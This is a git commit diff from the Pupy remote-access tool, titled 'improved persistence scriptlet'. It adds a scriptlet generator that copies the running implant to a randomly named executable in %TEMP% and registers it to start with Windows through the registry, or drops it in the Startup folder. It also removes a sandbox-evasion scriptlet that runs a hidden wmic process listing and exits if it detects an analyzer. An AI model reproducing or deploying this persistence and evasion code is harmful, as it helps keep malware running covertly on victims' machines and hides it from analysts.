improved persistence scriptlet

This commit is contained in:
n1nj4sec 2016-05-04 01:05:18 +02:00
parent 63881d8ddc
commit ce784a9469
5 changed files with 40 additions and 41 deletions

1
.gitignore vendored
View File

@ -37,6 +37,7 @@ pupy/modules/*.py[cod]
pupy/modules/lib/*.py[cod] pupy/modules/lib/*.py[cod]
pupy/modules/lib/**/*.py[cod] pupy/modules/lib/**/*.py[cod]
pupy/network/**/*.pyc pupy/network/**/*.pyc
pupy/scriptlets/**/*.pyc
# do not ignore package & templates files # do not ignore package & templates files
!pupy/packages/ !pupy/packages/

View File

@ -1,18 +0,0 @@
#!/usr/bin/env python
# -*- coding: UTF8 -*-
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
import subprocess
import re
try:
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
info.wShowWindow = subprocess.SW_HIDE
res=subprocess.Popen(["wmic.exe", "process" ,"get", "/FORMAT:LIST"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=info)
if re.search("CommandLine\\s*=\\s*C:\\\\Python27\\\\pythonw.exe\\s+C:\\\\[a-zA-Z0-9]+\\\\analyzer.py",res):
exit()
except Exception:
pass

View File

@ -0,0 +1,39 @@
#!/usr/bin/env python
# -*- coding: UTF8 -*-
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
import textwrap, random, string
from scriptlets import *
class ScriptletGenerator(Scriptlet):
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
arguments={
'method': 'available methods: registry, startup'
}
def __init__(self, method="registry"):
if not method in ("registry", "startup"):
raise ScriptletArgumentError("unknown persistence method %s"%method)
self.method=method
def generate(self):
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
if self.method=="registry":
return textwrap.dedent("""
import sys, shutil, os.path
if sys.platform=="win32":
import pupwinutils.persistence
path=os.path.join(os.path.expandvars("%TEMP%"), {})
shutil.copy(sys.executable, path)
pupwinutils.persistence.add_registry_startup(path)
""".format(name))
else:
return textwrap.dedent("""
import sys, shutil, os.path
if sys.platform=="win32":
shutil.copy(sys.executable, os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}"))
""".format(name))

View File

@ -1,23 +0,0 @@
#!/usr/bin/env python
# -*- coding: UTF8 -*-
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
import textwrap, random
from scriptlets import *
class ScriptletGenerator(Scriptlet):
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
def generate(self):
return textwrap.dedent("""
import sys, shutil, os.path, random, string
if sys.platform=="win32":
import pupwinutils.persistence
random.seed({})
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
path=os.path.join(os.path.expandvars("%TEMP%"), name)
shutil.copy(sys.executable, path)
pupwinutils.persistence.add_registry_startup(path)
""".format(int(random.getrandbits(32))))